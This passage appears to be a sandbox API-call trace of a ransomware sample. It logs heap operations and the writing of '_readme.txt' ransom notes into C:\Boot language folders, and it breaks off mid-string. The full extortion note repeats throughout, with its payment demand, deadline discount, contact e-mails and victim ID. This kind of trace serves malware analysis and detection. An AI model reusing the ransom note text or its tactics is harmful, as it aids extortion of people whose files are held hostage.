lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.087] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.088] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.088] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.089] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0128.089] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.089] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.089] PathFindFileNameW (pszPath="") returned="" [0128.089] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.089] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0128.089] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0128.090] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.090] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.092] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.093] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0128.093] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.093] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.093] PathFindFileNameW (pszPath="") returned="" [0128.093] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.093] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0128.093] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0128.093] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.094] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.095] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.096] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0128.096] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.096] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.096] PathFindFileNameW (pszPath="") returned="" [0128.096] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.096] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0128.096] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0128.097] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.097] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.099] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.099] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0128.099] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.099] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.099] PathFindFileNameW (pszPath="") returned="" [0128.100] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.100] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0128.100] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0128.100] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you 